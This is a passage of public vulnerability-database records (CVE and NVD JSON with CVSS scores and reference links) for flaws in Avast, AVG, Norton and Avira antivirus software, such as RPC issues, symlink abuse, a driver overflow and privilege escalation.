"refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10862", "datePublished": "2020-04-01T16:53:52", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.769Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10866 (GCVE-0-2020-10866)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.728Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to enumerate the network interfaces and access points from a Low Integrity process via RPC." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T17:04:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10866", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to enumerate the network interfaces and access points from a Low Integrity process via RPC." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10866", "datePublished": "2020-04-01T17:04:01", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.728Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2017-8307 (GCVE-0-2017-8307)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/98086 | vdb-entry, x_refsource_BID | |
https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T16:34:22.328Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "98086", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/98086" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-04-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before v17, using the LPC interface API exposed by the AvastSVC.exe Windows service, it is possible to launch predefined binaries, or replace or delete arbitrary files. This vulnerability is exploitable by any unprivileged user when Avast Self-Defense is disabled. It is also exploitable in conjunction with CVE-2017-8308 when Avast Self-Defense is enabled. The vulnerability allows for Denial of Service attacks and hiding traces of a possible attack." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-05-01T09:57:02", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "98086", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/98086" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2017-8307", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Avast Antivirus before v17, using the LPC interface API exposed by the AvastSVC.exe Windows service, it is possible to launch predefined binaries, or replace or delete arbitrary files. This vulnerability is exploitable by any unprivileged user when Avast Self-Defense is disabled. It is also exploitable in conjunction with CVE-2017-8308 when Avast Self-Defense is enabled. The vulnerability allows for Denial of Service attacks and hiding traces of a possible attack." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "98086", "refsource": "BID", "url": "http://www.securityfocus.com/bid/98086" }, { "name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201", "refsource": "MISC", "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2017-8307", "datePublished": "2017-04-27T20:00:00", "dateReserved": "2017-04-27T00:00:00", "dateUpdated": "2024-08-05T16:34:22.328Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2022-4294 (GCVE-0-2022-4294)
Vulnerability from cvelistv5
- CWE-269 - Improper Privilege Management
Vendor | Product | Version | |||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | NortonLifelock (GenDigital) | Norton Antivirus Windows Eraser Engine |
Version: prior to 119.1.5.1 |
||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:34:50.109Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2022-4294", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2025-04-08T14:53:38.976759Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2025-04-08T14:54:30.415Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Norton Antivirus Windows Eraser Engine", "vendor": "NortonLifelock (GenDigital)", "versions": [ { "status": "affected", "version": "prior to 119.1.5.1" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Avira Security ", "vendor": "NortonLifelock (GenDigital)", "versions": [ { "status": "affected", "version": "prior to 1.1.78" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Avast Antivirus", "vendor": "NortonLifelock (GenDigital)", "versions": [ { "status": "affected", "version": "Prior to 22.10" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "AVG Antivirus", "vendor": "NortonLifelock (GenDigital)", "versions": [ { "status": "affected", "version": "Prior to 22.10" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eNorton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.\u003c/span\u003e\u003cbr\u003e" } ], "value": "Norton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-269", "description": "CWE-269 Improper Privilege Management", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-10T09:22:11.371Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "source": { "discovery": "UNKNOWN" }, "title": "Norton, Avira, Avast and AVG Antivirus for Windows Privilege Escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2022-4294", "datePublished": "2023-01-10T09:14:47.102Z", "dateReserved": "2022-12-05T17:46:00.115Z", "dateUpdated": "2025-04-08T14:54:30.415Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Vulnerability from fkie_nvd
5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "041E50BD-12AB-47A1-98FF-5A9DAFC82247", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:anti-virus:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6C5599E-6B91-463D-B715-2962E9E98764", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Avast and AVG Antivirus for Windows were susceptible to a NULL pointer dereference issue via RPC-interface. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "id": "CVE-2023-1587", "lastModified": "2024-11-21T07:39:29.850", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 4.7, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2023-04-19T19:15:07.030", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://www.mcerlane.co.uk/CVE-2019-11230/ | Exploit, Third Party Advisory | |
cve@mitre.org | http://www.securityfocus.com/bid/109344 | Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.mcerlane.co.uk/CVE-2019-11230/ | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/109344 | Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "730BD260-2D89-42C7-B7F5-D3CE284A0571", "versionEndExcluding": "19.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before 19.4, a local administrator can trick the product into renaming arbitrary files by replacing the Logs\\Update.log file with a symlink. The next time the product attempts to write to the log file, the target of the symlink is renamed. This defect can be exploited to rename a critical product file (e.g., AvastSvc.exe), causing the product to fail to start on the next system restart." }, { "lang": "es", "value": "En Avast Antivirus antes de 19.4, un administrador local puede enga\u00f1ar al producto para que cambie el nombre de los archivos arbitrarios al reemplazar el archivo Logs \\ Update.log con un enlace simb\u00f3lico. La pr\u00f3xima vez que el producto intente escribir en el archivo de registro, se cambiar\u00e1 el nombre del destino del enlace simb\u00f3lico. Este defecto se puede aprovechar para cambiar el nombre de un archivo de producto cr\u00edtico (por ejemplo, AvastSvc.exe), lo que hace que el producto no se inicie en el pr\u00f3ximo reinicio del sistema." } ], "id": "CVE-2019-11230", "lastModified": "2024-11-21T04:20:46.377", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.6, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 0.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-07-18T17:15:11.880", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.mcerlane.co.uk/CVE-2019-11230/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/109344" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.mcerlane.co.uk/CVE-2019-11230/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/109344" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-59" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://avast.com | Vendor Advisory | |
cve@mitre.org | https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write | Patch, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://avast.com | Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write | Patch, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "228EF642-BA80-47F0-BD6B-2824131707DA", "versionEndExcluding": "19.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Buffer Overflow vulnerability in Avast AntiVirus before v.19.7 allows a local attacker to cause a denial of service via a crafted request to the aswSnx.sys driver." } ], "id": "CVE-2020-20118", "lastModified": "2024-11-21T05:11:50.680", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2023-07-11T14:15:09.300", "references": [ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://avast.com" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://avast.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gitlab.com/yongchuank/avast-aswsnx-ioctl-82ac0060-oob-write" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-120" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "9530DCD6-2AE4-4E7E-A67A-5E5F87CE3DF3", "versionEndExcluding": "20.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in the Sandbox component of Avast Antivirus prior to 20.4 allows a local sandboxed code to gain elevated privileges by using system IPC interfaces which could lead to exit the sandbox and acquire SYSTEM privileges." }, { "lang": "es", "value": "Una vulnerabilidad de escalada de privilegios en el componente Sandbox de Avast Antivirus versiones anteriores a 20.4, permite a un c\u00f3digo local del sandbox alcanzar privilegios elevados al usar las interfaces IPC del sistema, lo que podr\u00eda conllevar a una salida del sandbox y la adquisici\u00f3n de privilegios de SYSTEM" } ], "id": "CVE-2021-45336", "lastModified": "2024-11-21T06:32:06.333", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.0, "impactScore": 6.0, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-12-27T14:15:07.750", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://www.securityfocus.com/bid/98086 | Third Party Advisory, VDB Entry | |
cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | Exploit, Technical Description, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/98086 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | Exploit, Technical Description, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "54ED80B2-E917-49FA-9FD8-C6010E8CBA5B", "versionEndIncluding": "12.3.2279", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before v17, using the LPC interface API exposed by the AvastSVC.exe Windows service, it is possible to launch predefined binaries, or replace or delete arbitrary files. This vulnerability is exploitable by any unprivileged user when Avast Self-Defense is disabled. It is also exploitable in conjunction with CVE-2017-8308 when Avast Self-Defense is enabled. The vulnerability allows for Denial of Service attacks and hiding traces of a possible attack." }, { "lang": "es", "value": "En Avast Antivirus versiones anteriores a v17, utilizando el API de interfaz LPC expuesto por el servicio AvastSVC.exe de Windows, es posible iniciar binarios predefinidos o reemplazar o eliminar archivos arbitrarios. Esta vulnerabilidad es explotable por cualquier usuario no privilegiado cuando Avast Self Defense est\u00e1 deshabilitada. Tambi\u00e9n puede explotarse junto con CVE-2017-8308 cuando Avast Self Defense est\u00e1 habilitada. La vulnerabilidad permite ataques de denegaci\u00f3n de servicio y ocultar rastros de un posible ataque." } ], "id": "CVE-2017-8307", "lastModified": "2025-04-20T01:37:25.860", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2017-04-27T20:59:00.167", "references": [ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/98086" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/98086" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Deferred", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
